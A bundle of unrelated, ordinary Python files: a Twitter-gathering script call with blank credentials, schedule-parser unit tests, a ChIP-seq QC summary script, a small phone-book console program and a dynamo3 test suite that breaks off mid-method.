

# Naming options for tables, intermediates and outputs are available in the wrapper.
if __name__ == "__main__":
    """
        The tool is not supplied with Tweets out-of-the-box. Set 'gather_data' to True and leave it
        running for a while. If loop is false it will terminate in a minute or so and create a map from the results automatically
        
        This tool was tested and intended for OSGeo Live installs used in the GeoScripting course.
    """
    import tweetAnalysisWrapper
    # NOTE(review): "ouputdb" (sic) must match the wrapper's actual keyword —
    # confirm against performTweetResearch's signature before renaming.
    # Credentials below are intentionally blank; fill them in from
    # developer.twitter.com before gathering data.
    tweetAnalysisWrapper.performTweetResearch(folder_path = r"/home/user/git/SatoshiNakamotoGeoscripting/Final_assignment",
                                              defaultdb = "postgres", # Making a new database requires connecting to an existing database
                                              user = "user", # PostgreSQL username (user is default value on OSGeo Live)
                                              password = "user", # PostgreSQL password (user is default on OSGeo Live)
                                              ouputdb = "tweet_research", # Specify the output database that is to be created
                                              tweet_table_name = "tweets", # Output table where the Tweets are stored
                                              gather_data = True, # When True: Will gather data from the Twitter stream
                                              search_terms = ["Trump"], # Twitter terms to search for                                   
                                              loop_gathering = False, # When True: Will not stop gathering when terminated - use for prolonged gathering
                                              APP_KEY = "", # Get these from developer.twitter.com when you make your application
                                              APP_SECRET =  "",
                                              OAUTH_TOKEN =  "",
                                              OAUTH_TOKEN_SECRET = "")

#!/usr/bin/python
#coding: utf-8

from __future__ import unicode_literals

import os
import unittest
import xlrd

import msp.schedule_parser as schedule_parser

__author__ = "Andrey Konovalov"
__copyright__ = "Copyright (C) 2014 Andrey Konovalov"
__license__ = "MIT"
__version__ = "0.1"

this_dir, this_filename = os.path.split(__file__)
SCHEDULE_PATH = os.path.join(this_dir, "..", "data", "2013_fall", "4kurs.xls")

class WeekdayRangeTest(unittest.TestCase):
  """Row span reported for each weekday of the parsed sheet."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    expected_ranges = [(4, 11), (12, 19), (20, 27), (28, 37), (38, 47), (48, 57)]
    for weekday, expected in enumerate(expected_ranges):
      self.assertEqual(self.schedule.GetWeekdayRange(weekday), expected)

class DepartmentCountTest(unittest.TestCase):
  """The sheet must describe exactly nine departments."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    department_count = self.schedule.GetDepartmentCount()
    self.assertEqual(department_count, 9)

class DepartmentRangeTest(unittest.TestCase):
  """Column span reported for each department."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    expected_ranges = [
        (2, 11), (13, 20), (22, 32), (34, 36), (38, 43),
        (45, 53), (55, 62), (64, 71), (73, 77),
    ]
    for department, expected in enumerate(expected_ranges):
      self.assertEqual(self.schedule.GetDepartmentRange(department), expected)

class DepartmentsRowTest(unittest.TestCase):
  """The departments header occupies row 3."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    departments_row = self.schedule.GetDepartmentsRow()
    self.assertEqual(departments_row, 3)

class HoursColumnTest(unittest.TestCase):
  """The hours header occupies column 1."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    hours_column = self.schedule.GetHoursColumn()
    self.assertEqual(hours_column, 1)

class HoursRangesTest(unittest.TestCase):
  """Per-pair row ranges reported for selected weekdays."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    cases = [
        (0, [(4, 5), (5, 6), (6, 7), (7, 8), (8, 9), (9, 10), (10, 11)]),
        (3, [(28, 30), (30, 31), (31, 32), (32, 34), (34, 35), (35, 36), (36, 37)]),
        (5, [(48, 49), (49, 50), (50, 52), (52, 53), (53, 54), (54, 56), (56, 57)]),
    ]
    for weekday, expected in cases:
      self.assertEqual(self.schedule.GetHoursRanges(weekday), expected)

class GroupCountTest(unittest.TestCase):
  """Number of groups reported per department."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    expected_counts = [9, 7, 8, 2, 5, 8, 7, 7, 4]
    for department, expected in enumerate(expected_counts):
      self.assertEqual(self.schedule.GetGroupCount(department), expected)

class GroupListTest(unittest.TestCase):
  """Group name lists reported for selected departments."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    cases = [
        (0, ['011', '012', '013', '014', '015', '016', '017', '018', '019']),
        (1, ['021', '022', '023', '024', '025', '026', '028']),
        (3, ['041', '042']),
        (8, ['0111', '0112', '0113', '0114']),
    ]
    for department, expected in cases:
      self.assertEqual(self.schedule.GetGroupList(department), expected)


class GroupRangeTest(unittest.TestCase):
  """Column span reported for (department, group) pairs."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    cases = [
        (0, 0, (2, 3)),
        (0, 1, (3, 4)),
        (2, 1, (23, 25)),
        (2, 2, (25, 26)),
        (2, 3, (26, 28)),
        (5, 3, (48, 49)),
        (8, 0, (73, 74)),
        (8, 3, (76, 77)),
    ]
    for department, group, expected in cases:
      self.assertEqual(self.schedule.GetGroupRange(department, group), expected)

class WeekdayByRowTest(unittest.TestCase):
  """Reverse lookup: sheet row to weekday index."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    cases = [
        (4, 0), (5, 0), (10, 0), (13, 1), (25, 2),
        (26, 2), (28, 3), (44, 4), (48, 5), (56, 5),
    ]
    for row, expected_weekday in cases:
      self.assertEqual(self.schedule.GetWeekdayByRow(row), expected_weekday)

class PairByRowTest(unittest.TestCase):
  """Reverse lookup: sheet row to (pair index, sub-row) tuple."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    cases = [
        (4, (0, 0)), (5, (1, 0)), (10, (6, 0)), (12, (0, 0)), (28, (0, 0)),
        (29, (0, 1)), (30, (1, 0)), (33, (3, 1)), (56, (6, 0)),
    ]
    for row, expected_pair in cases:
      self.assertEqual(self.schedule.GetPairByRow(row), expected_pair)

class DepartmentByColumnTest(unittest.TestCase):
  """Reverse lookup: sheet column to department index."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    cases = [
        (2, 0), (3, 0), (10, 0), (13, 1), (18, 1), (19, 1), (22, 2),
        (24, 2), (31, 2), (39, 4), (64, 7), (70, 7), (73, 8), (76, 8),
    ]
    for column, expected_department in cases:
      self.assertEqual(self.schedule.GetDepartmentIndexByColumn(column), expected_department)

class GroupByColumnTest(unittest.TestCase):
  """Reverse lookup: sheet column to (group index, sub-column) tuple."""

  def setUp(self):
    parsed = schedule_parser.Schedule()
    parsed.Parse(SCHEDULE_PATH)
    self.schedule = parsed

  def runTest(self):
    cases = [
        (2, (0, 0)), (3, (1, 0)), (10, (8, 0)), (23, (1, 0)), (24, (1, 1)),
        (25, (2, 0)), (26, (3, 0)), (27, (3, 1)), (76, (3, 0)),
    ]
    for column, expected_group in cases:
      self.assertEqual(self.schedule.GetGroupIndexByColumn(column), expected_group)

def suite():
  """Assemble every schedule-parser test case into a single TestSuite.

  Fix: the original created a ``unittest.TestLoader`` that was never used;
  it has been removed.
  """
  test_cases = [
      WeekdayRangeTest,
      DepartmentCountTest,
      DepartmentRangeTest,
      DepartmentsRowTest,
      HoursColumnTest,
      HoursRangesTest,
      GroupCountTest,
      GroupListTest,
      GroupRangeTest,
      WeekdayByRowTest,
      PairByRowTest,
      DepartmentByColumnTest,
      GroupByColumnTest,
  ]
  result = unittest.TestSuite()
  for case in test_cases:
    result.addTest(case())
  return result

# Run the full suite with verbose per-test output when executed directly.
if __name__ == '__main__':
   unittest.TextTestRunner(verbosity=2).run(suite())


import gzip
import glob

import numpy as np
import pandas as pd

from scipy.stats import pearsonr
from scipy.stats import spearmanr


def get_num_lines_gz(filename):
    """Return the number of lines in the gzip-compressed file *filename*.

    Args:
        filename: path to a .gz file.

    Returns:
        int line count (0 for an empty file).
    """
    # Iterating the file object yields lines; sum() replaces the manual counter.
    with gzip.open(filename, "r") as fp:
        return sum(1 for _ in fp)


def main():
    """Summarize ChIP-seq QC metrics into a tab-separated table.

    Collects, per mark/timepoint/replicate: nodup read counts, library
    complexity (NRF/PBC1/PBC2), and peak counts (macs2, overlap, IDR),
    then writes ggr.ChIP-seq.QC.summary.txt.

    NOTE(review): the original docstring said "get stats from PAS-seq",
    but every path and metric below is ChIP-seq — confirm intent.
    """
    # files
    DATA_DIR = "/mnt/lab_data/kundaje/projects/skin/data/bds/processed.chipseq.2017-01-23.histones"

    # params
    marks = ["H3K27ac", "H3K4me1", "H3K27me3", "CTCF"]
    days = np.arange(0, 7, 3)
    days = ["d{}".format(day).replace(".", "") for day in days]
    reps = ["1", "2"]

    # results: one parallel list per output column
    results = {}
    results["mark_or_tf"] = []
    results["timepoint"] = []
    results["replicate"] = []
    #results["num_input_reads"] = []
    results["num_nodup_reads"] = []
    results["NRF"] = []
    results["PBC1"] = []
    results["PBC2"] = []
    results["num_macs2_peaks"] = []
    results["num_overlap_peaks"] = []
    results["num_idr_peaks"] = []

    for mark in marks:
        # BUGFIX: "print mark" is Python 2 syntax and a SyntaxError under the
        # python3 interpreter this pipeline otherwise targets.
        print(mark)
        for day in days:
            for rep in reps:

                # timepoint, rep
                results["mark_or_tf"].append(mark)
                results["timepoint"].append(day)
                results["replicate"].append(rep)

                # nodup reads, from samtools flagstat output
                nodup_log = glob.glob(
                    "{}/*{}*{}*/qc/rep{}/*nodup.flagstat.qc".format(
                        DATA_DIR, day, mark, rep))[0]
                with open(nodup_log, "r") as fp:
                    for line in fp:
                        # NOTE(review): assumes "in total" occurs exactly once
                        # per flagstat file; multiple matches would append
                        # extra rows and break the parallel lists -- confirm.
                        if "in total" in line:
                            num_nodup_reads = line.split("+")[0].strip()
                            results["num_nodup_reads"].append(num_nodup_reads)

                # NRF/PBC1/PBC2
                lib_log = glob.glob(
                    "{}/*{}*{}*/qc/rep{}/*nodup.pbc.qc".format(
                        DATA_DIR, day, mark, rep))[0]
                with open(lib_log, "r") as fp:
                    # cols 5,6,7 is NRF/PBC1/PBC2; only the last line is used.
                    # NOTE(review): an empty pbc.qc file leaves `fields`
                    # unbound (NameError) -- confirm files are never empty.
                    for line in fp:
                        fields = line.strip().split()
                    results["NRF"].append(fields[4])
                    results["PBC1"].append(fields[5])
                    results["PBC2"].append(fields[6])

                # peak files
                macs2_peaks = glob.glob(
                    "{}/*{}*{}*/peak/macs2/rep{}/*narrowPeak.gz".format(
                        DATA_DIR, day, mark, rep))[0]
                num_macs2 = get_num_lines_gz(macs2_peaks)
                results["num_macs2_peaks"].append(num_macs2)

                # CTCF (a TF) uses IDR peaks; histone marks use overlap peaks.
                if "CTCF" in mark:
                    idr_peaks = glob.glob(
                        "{}/*{}*{}*/peak/idr/true_reps/rep1-rep2/*filt.narrowPeak.gz".format(
                            DATA_DIR, day, mark))[0]
                    num_idr = get_num_lines_gz(idr_peaks)
                    results["num_idr_peaks"].append(num_idr)
                    results["num_overlap_peaks"].append("NA")
                else:
                    results["num_idr_peaks"].append("NA")
                    # (dropped an unused 4th .format() arg present in the original)
                    overlap_peaks = glob.glob(
                        "{}/*{}*{}*/peak/macs2/overlap/*filt.narrowPeak.gz".format(
                            DATA_DIR, day, mark))[0]
                    num_overlap = get_num_lines_gz(overlap_peaks)
                    results["num_overlap_peaks"].append(num_overlap)

    # dataframe with columns in presentation order
    results = pd.DataFrame(results)
    ordered_headers = [
        "mark_or_tf",
        "timepoint",
        "replicate",
        #"num_input_reads",
        "num_nodup_reads",
        "NRF",
        "PBC1",
        "PBC2",
        "num_macs2_peaks",
        "num_overlap_peaks",
        "num_idr_peaks"]
    results = results[ordered_headers]
    out_file = "ggr.ChIP-seq.QC.summary.txt"
    results.to_csv(out_file, sep="\t", header=True, index=False)


    return

main()


student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}

def Handler() :
	"""Interactive console menu: 1 = search by phone number, 2 = insert, 0 = quit."""
	while (1) :
		try:
			# SECURITY FIX: the original used eval(input(...)), which executes
			# arbitrary expressions typed by the user. Parse a plain integer.
			choice = int(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
		except ValueError:
			choice = -1  # non-numeric input falls through to "Enter correct choice"
		print(choice)
		if (choice == 1) :
			if (student_phoneNumber_name) :
				phone_number = input("Enter student's phone number : ")
				name = SearchRecord(phone_number)
				if (name) :
					print("name : " + name )
				else :
					# NOTE(review): lookups use the raw input() string while the
					# seed dict has int keys -- seeded entries never match; confirm.
					print(str(phone_number) + "Does not exist in record" + str(name))
			else :
				print("Record is empty ")
		elif (choice == 2) :
			phone_number = input("Enter student's phone number : ")
			name = input("Enter student's name : ")
			InsertRecord(phone_number, name)
		elif (choice == 0) :
			break
		else:
			print("Enter correct choice")

def InsertRecord(x, y):
	"""Store (or overwrite) name *y* under phone number *x* in the module dict."""
	student_phoneNumber_name[x] = y
	
def SearchRecord(x):
	"""Echo the query, then return the stored name for *x*, or False when absent."""
	print(x)
	return student_phoneNumber_name.get(x, False)
	
		
# Run the interactive menu, then dump the final record table.
Handler()

print(student_phoneNumber_name)
""" Tests for Dynamo3 """

import sys
import unittest
from decimal import Decimal
from pickle import dumps, loads
from urllib.parse import urlparse

from botocore.exceptions import ClientError
from mock import ANY, MagicMock, patch

from dynamo3 import (
    Binary,
    Dynamizer,
    DynamoDBConnection,
    DynamoDBError,
    DynamoKey,
    GlobalIndex,
    Limit,
    Table,
    ThroughputException,
)
from dynamo3.constants import STRING
from dynamo3.result import Capacity, ConsumedCapacity, Count, ResultSet, add_dicts


class BaseSystemTest(unittest.TestCase):

    """Base class for system tests"""

    dynamo: DynamoDBConnection = None  # type: ignore

    def _drop_all_tables(self):
        """Delete every table reachable through the shared connection."""
        for name in self.dynamo.list_tables():
            self.dynamo.delete_table(name)

    def setUp(self):
        super(BaseSystemTest, self).setUp()
        # Each test starts against an empty database.
        self._drop_all_tables()

    def tearDown(self):
        super(BaseSystemTest, self).tearDown()
        # Remove tables and hooks the test may have left behind.
        self._drop_all_tables()
        self.dynamo.clear_hooks()


class TestMisc(BaseSystemTest):

    """Tests that don't fit anywhere else"""

    def tearDown(self):
        super(TestMisc, self).tearDown()
        # Undo the flag flipped by test_default_return_capacity.
        self.dynamo.default_return_capacity = False

    def test_connection_host(self):
        """Connection can access host of endpoint"""
        # urlparse raising would fail the test; no assertion needed.
        urlparse(self.dynamo.host)

    def test_connection_region(self):
        """Connection can access name of connected region"""
        self.assertTrue(isinstance(self.dynamo.region, str))

    def test_connect_to_region(self):
        """Can connect to a dynamo region"""
        conn = DynamoDBConnection.connect("us-west-1")
        self.assertIsNotNone(conn.host)

    def test_connect_to_region_creds(self):
        """Can connect to a dynamo region with credentials"""
        conn = DynamoDBConnection.connect(
            "us-west-1", access_key="abc", secret_key="12345"
        )
        self.assertIsNotNone(conn.host)

    def test_connect_to_host_without_session(self):
        """Can connect to a dynamo host without passing in a session"""
        conn = DynamoDBConnection.connect("us-west-1", host="localhost")
        self.assertIsNotNone(conn.host)

    @patch("dynamo3.connection.time")
    def test_retry_on_throughput_error(self, time):
        """Throughput exceptions trigger a retry of the request"""

        def call(*_, **__):
            """Dummy service call"""
            # Shaped like a real botocore error payload for a throttled call.
            response = {
                "ResponseMetadata": {
                    "HTTPStatusCode": 400,
                },
                "Error": {
                    "Code": "ProvisionedThroughputExceededException",
                    "Message": "Does not matter",
                },
            }
            raise ClientError(response, "list_tables")

        with patch.object(self.dynamo, "client") as client:
            client.list_tables.side_effect = call
            with self.assertRaises(ThroughputException):
                self.dynamo.call("list_tables")
        # One sleep per retry; the final attempt re-raises without sleeping.
        self.assertEqual(len(time.sleep.mock_calls), self.dynamo.request_retries - 1)
        self.assertTrue(time.sleep.called)

    def test_describe_missing(self):
        """Describing a missing table returns None"""
        ret = self.dynamo.describe_table("foobar")
        self.assertIsNone(ret)

    def test_magic_table_props(self):
        """Table can look up properties on response object"""
        hash_key = DynamoKey("id")
        self.dynamo.create_table("foobar", hash_key=hash_key)
        ret = self.dynamo.describe_table("foobar")
        assert ret is not None
        self.assertEqual(ret.item_count, ret["ItemCount"])
        with self.assertRaises(KeyError):
            self.assertIsNotNone(ret["Missing"])

    def test_magic_index_props(self):
        """Index can look up properties on response object"""
        index = GlobalIndex.all("idx-name", DynamoKey("id"))
        index.response = {"FooBar": 2}
        self.assertEqual(index["FooBar"], 2)
        with self.assertRaises(KeyError):
            self.assertIsNotNone(index["Missing"])

    def test_describe_during_delete(self):
        """Describing a table during a delete operation should not crash"""
        response = {
            "ItemCount": 0,
            "ProvisionedThroughput": {
                "NumberOfDecreasesToday": 0,
                "ReadCapacityUnits": 5,
                "WriteCapacityUnits": 5,
            },
            "TableName": "myTableName",
            "TableSizeBytes": 0,
            "TableStatus": "DELETING",
        }
        table = Table.from_response(response)
        self.assertEqual(table.status, "DELETING")

    def test_delete_missing(self):
        """Deleting a missing table returns False"""
        ret = self.dynamo.delete_table("foobar")
        self.assertTrue(not ret)

    def test_re_raise_passthrough(self):
        """DynamoDBError can re-raise itself if missing original exception"""
        err = DynamoDBError(400, Code="ErrCode", Message="Ouch", args={})
        caught = False
        try:
            err.re_raise()
        except DynamoDBError as e:
            caught = True
            self.assertEqual(err, e)
        self.assertTrue(caught)

    def test_re_raise(self):
        """DynamoDBError can re-raise itself with stacktrace of original exc"""
        caught = False
        try:
            try:
                raise Exception("Hello")
            except Exception as e1:
                # Capture the live traceback so re_raise can reuse it.
                err = DynamoDBError(
                    400,
                    Code="ErrCode",
                    Message="Ouch",
                    args={},
                    exc_info=sys.exc_info(),
                )
                err.re_raise()
        except DynamoDBError as e:
            caught = True
            import traceback

            # The original raise site ("Hello") must appear in the traceback.
            tb = traceback.format_tb(e.__traceback__)
            self.assertIn("Hello", tb[-1])
            self.assertEqual(e.status_code, 400)
        self.assertTrue(caught)

    def test_default_return_capacity(self):
        """When default_return_capacity=True, always return capacity"""
        self.dynamo.default_return_capacity = True
        with patch.object(self.dynamo, "call") as call:
            call().get.return_value = None
            rs = self.dynamo.scan("foobar")
            list(rs)
        call.assert_called_with(
            "scan",
            TableName="foobar",
            ReturnConsumedCapacity="INDEXES",
            ConsistentRead=False,
        )

    def test_list_tables_page(self):
        """Call to ListTables should page results"""
        hash_key = DynamoKey("id")
        # 120 tables forces at least two ListTables pages (service pages at 100).
        for i in range(120):
            self.dynamo.create_table("table%d" % i, hash_key=hash_key)
        tables = list(self.dynamo.list_tables(110))
        self.assertEqual(len(tables), 110)

    def test_limit_complete(self):
        """A limit with item_capacity = 0 is 'complete'"""
        limit = Limit(item_limit=0)
        self.assertTrue(limit.complete)

    def test_wait_create_table(self):
        """Create table shall wait for the table to come online."""
        tablename = "foobar_wait"
        hash_key = DynamoKey("id")
        self.dynamo.create_table(tablename, hash_key=hash_key, wait=True)
        self.assertIsNotNone(self.dynamo.describe_table(tablename))

    def test_wait_delete_table(self):
        """Delete table shall wait for the table to go offline."""
        tablename = "foobar_wait"
        hash_key = DynamoKey("id")
        self.dynamo.create_table(tablename, hash_key=hash_key, wait=True)
        result = self.dynamo.delete_table(tablename, wait=True)
        self.assertTrue(result)


class TestDataTypes(BaseSystemTest):

    """Tests for Dynamo data types"""

    def make_table(self):
        """Convenience method for making a table"""
        hash_key = DynamoKey("id")
        self.dynamo.create_table("foobar", hash_key=hash_key)

    def test_string(self):
        """Store and retrieve a string"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "abc"})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["id"], "abc")
        self.assertTrue(isinstance(item["id"], str))

    def test_int(self):
        """Store and retrieve an int"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "num": 1})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["num"], 1)

    def test_float(self):
        """Store and retrieve a float"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "num": 1.1})
        item = list(self.dynamo.scan("foobar"))[0]
        # Dynamo round-trips numbers as Decimal; compare as float with tolerance.
        self.assertAlmostEqual(float(item["num"]), 1.1)

    def test_decimal(self):
        """Store and retrieve a Decimal"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "num": Decimal("1.1")})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["num"], Decimal("1.1"))

    def test_binary(self):
        """Store and retrieve a binary"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "data": Binary("abc")})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["data"].value, b"abc")

    def test_binary_bytes(self):
        """Store and retrieve bytes as a binary"""
        self.make_table()
        data = {"a": 1, "b": 2}
        # Pickle round-trip through a Binary attribute.
        self.dynamo.put_item("foobar", {"id": "a", "data": Binary(dumps(data))})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(loads(item["data"].value), data)

    def test_string_set(self):
        """Store and retrieve a string set"""
        self.make_table()
        item = {
            "id": "a",
            "datas": set(["a", "b"]),
        }
        self.dynamo.put_item("foobar", item)
        ret = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(ret, item)

    def test_number_set(self):
        """Store and retrieve a number set"""
        self.make_table()
        item = {
            "id": "a",
            "datas": set([1, 2, 3]),
        }
        self.dynamo.put_item("foobar", item)
        ret = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(ret, item)

    def test_binary_set(self):
        """Store and retrieve a binary set"""
        self.make_table()
        item = {
            "id": "a",
            "datas": set([Binary("a"), Binary("b")]),
        }
        self.dynamo.put_item("foobar", item)
        ret = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(ret, item)

    def test_binary_equal(self):
        """Binary should eq other Binaries and also raw bytestrings"""
        self.assertEqual(Binary("a"), Binary("a"))
        self.assertEqual(Binary("a"), b"a")
        # __ne__ must agree with __eq__.
        self.assertFalse(Binary("a") != Binary("a"))

    def test_binary_repr(self):
        """Binary repr should wrap the contained value"""
        self.assertEqual(repr(Binary("a")), "Binary(%r)" % b"a")

    def test_binary_converts_unicode(self):
        """Binary will convert unicode to bytes"""
        b = Binary("a")
        self.assertTrue(isinstance(b.value, bytes))

    def test_binary_force_string(self):
        """Binary must wrap a string type"""
        with self.assertRaises(TypeError):
            Binary(2)  # type: ignore

    def test_bool(self):
        """Store and retrieve a boolean"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "abc", "b": True})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["b"], True)
        # Must come back as bool, not a Dynamo number.
        self.assertTrue(isinstance(item["b"], bool))

    def test_list(self):
        """Store and retrieve a list"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "abc", "l": ["a", 1, False]})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["l"], ["a", 1, False])

    def test_dict(self):
        """Store and retrieve a dict"""
        self.make_table()
        data = {
            "i": 1,
            "s": "abc",
            "n": None,
            "l": ["a", 1, True],
            "b": False,
        }
        self.dynamo.put_item("foobar", {"id": "abc", "d": data})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["d"], data)

    def test_nested_dict(self):
        """Store and retrieve a nested dict"""
        self.make_table()
        data = {
            "s": "abc",
            "d": {
                "i": 42,
            },
        }
        self.dynamo.put_item("foobar", {"id": "abc", "d": data})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["d"], data)

    def test_nested_list(self):
        """Store and retrieve a nested list"""
        self.make_table()
        data = [
            1,
            [
                True,
                None,
                "abc",
            ],
        ]
        self.dynamo.put_item("foobar", {"id": "abc", "l": data})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["l"], data)

    def test_unrecognized_type(self):
        """Dynamizer throws error on unrecognized type"""
        # "ASDF" is not a valid DynamoDB type tag.
        value = {
            "ASDF": "abc",
        }
        with self.assertRaises(TypeError):
            self.dynamo.dynamizer.decode(value)


class TestDynamizer(unittest.TestCase):

    """Tests for the Dynamizer"""

    def test_register_encoder(self):
        """Can register a custom encoder"""
        from datetime import datetime

        dzr = Dynamizer()
        # Encoder receives (dynamizer, value) and returns a (type, string) pair.
        dzr.register_encoder(datetime, lambda _dzr, value: (STRING, value.isoformat()))
        moment = datetime.utcnow()
        self.assertEqual(dzr.raw_encode(moment), (STRING, moment.isoformat()))

    def test_encoder_missing(self):
        """If no encoder is found, raise ValueError"""
        from datetime import datetime

        dzr = Dynamizer()
        # No datetime encoder registered on this instance.
        with self.assertRaises(ValueError):
            dzr.encode(datetime.utcnow())


class TestResultModels(unittest.TestCase):

    """Tests for the model classes in results.py"""

    def test_add_dicts_base_case(self):
        """add_dict where one argument is None returns the other"""
        f = object()
        self.assertEqual(add_dicts(f, None), f)
        self.assertEqual(add_dicts(None, f), f)

    def test_add_dicts(self):
        """Merge two dicts of values together"""
        a = {
            "a": 1,
            "b": 2,
        }
        b = {
            "a": 3,
            "c": 4,
        }
        # Shared keys are summed; unique keys are carried over.
        ret = add_dicts(a, b)
        self.assertEqual(
            ret,
            {
                "a": 4,
                "b": 2,
                "c": 4,
            },
        )

    def test_count_repr(self):
        """Count repr"""
        count = Count(0, 0)
        self.assertEqual(repr(count), "Count(0)")

    def test_count_addition(self):
        """Count addition"""
        count = Count(4, 2)
        self.assertEqual(count + 5, 9)

    def test_count_subtraction(self):
        """Count subtraction"""
        count = Count(4, 2)
        self.assertEqual(count - 2, 2)

    def test_count_multiplication(self):
        """Count multiplication"""
        count = Count(4, 2)
        self.assertEqual(2 * count, 8)

    def test_count_division(self):
        """Count division"""
        count = Count(4, 2)
        self.assertEqual(count / 2, 2)

    def test_count_add_none_capacity(self):
        """Count addition with one None consumed_capacity"""
        cap = Capacity(3, 0)
        count = Count(4, 2)
        count2 = Count(5, 3, cap)
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        # The non-None capacity is carried through unchanged.
        self.assertEqual(ret.consumed_capacity, cap)

    def test_count_add_capacity(self):
        """Count addition with consumed_capacity"""
        count = Count(4, 2, Capacity(3, 0))
        count2 = Count(5, 3, Capacity(2, 0))
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        self.assertEqual(ret.consumed_capacity.read, 5)

    def test_capacity_math(self):
        """Capacity addition and equality"""
        cap = Capacity(2, 4)
        # Hashable and equality-consistent: usable in sets.
        s = set([cap])
        self.assertIn(Capacity(2, 4), s)
        self.assertNotEqual(Capacity(1, 4), cap)
        self.assertEqual(Capacity(1, 1) + Capacity(2, 2), Capacity(3, 3))

    def test_capacity_format(self):
        """String formatting for Capacity"""
        c = Capacity(1, 3)
        self.assertEqual(str(c), "R:1.0 W:3.0")
        c = Capacity(0, 0)
        self.assertEqual(str(c), "0")

    def test_total_consumed_capacity(self):
        """ConsumedCapacity can parse results with only Total"""
        response = {
            "TableName": "foobar",
            "ReadCapacityUnits": 4,
            "WriteCapacityUnits": 5,
        }
        cap = ConsumedCapacity.from_response(response)
        self.assertEqual(cap.total, (4, 5))
        self.assertIsNone(cap.table_capacity)

    def test_consumed_capacity_equality(self):
        """ConsumedCapacity addition and equality"""
        cap = ConsumedCapacity(
            "foobar",
            Capacity(0, 10),
            Capacity(0, 2),
            {
                "l-index": Capacity(0, 4),
            },
            {
                "g-index": Capacity(0, 3),
            },
        )
        c2 = ConsumedCapacity(
            "foobar",
            Capacity(0, 10),
            Capacity(0, 2),
            {
                "l-index": Capacity(0, 4),
                "l-index2": Capacity(0, 7),
            },
        )

        self.assertNotEqual(cap, c2)
        # c3 is field-for-field identical to cap.
        c3 = ConsumedCapacity(
            "foobar",
            Capacity(0, 10),
            Capacity(0, 2),
            {
                "l-index": Capacity(0, 4),
            },
            {
                "g-index": Capacity(0, 3),
            },
        )
        self.assertIn(cap, set([c3]))
        combined = cap + c2
        # Per-index capacities merge by key; missing keys carry over.
        self.assertEqual(
            cap + c2,
            ConsumedCapacity(
                "foobar",
                Capacity(0, 20),
                Capacity(0, 4),
                {
                    "l-index": Capacity(0, 8),
                    "l-index2": Capacity(0, 7),
                },
                {
                    "g-index": Capacity(0, 3),
                },
            ),
        )
        self.assertIn(str(Capacity(0, 3)), str(combined))

    def test_add_different_tables(self):
        """Cannot add ConsumedCapacity of two different tables"""
        c1 = ConsumedCapacity("foobar", Capacity(1, 28))
        c2 = ConsumedCapacity("boofar", Capacity(3, 0))
        with self.assertRaises(TypeError):
            c1 += c2

    def test_always_continue_query(self):
        """Regression test.
        If result has no items but does have LastEvaluatedKey, keep querying.
        """
        conn = MagicMock()
        conn.dynamizer.decode_keys.side_effect = lambda x: x
        items = ["a", "b"]
        # Two empty pages with continuation keys, then the real items.
        results = [
            {"Items": [], "LastEvaluatedKey": {"foo": 1, "bar": 2}},
            {"Items": [], "LastEvaluatedKey": {"foo": 1, "bar": 2}},
            {"Items": items},
        ]
        conn.call.side_effect = lambda *_, **__: results.pop(0)
        rs = ResultSet(conn, Limit())
        # (rebinds `results`; the side_effect closure has already captured the list)
        results = list(rs)
        self.assertEqual(results, items)


class TestHooks(BaseSystemTest):

    """Tests for connection callback hooks"""

    def tearDown(self):
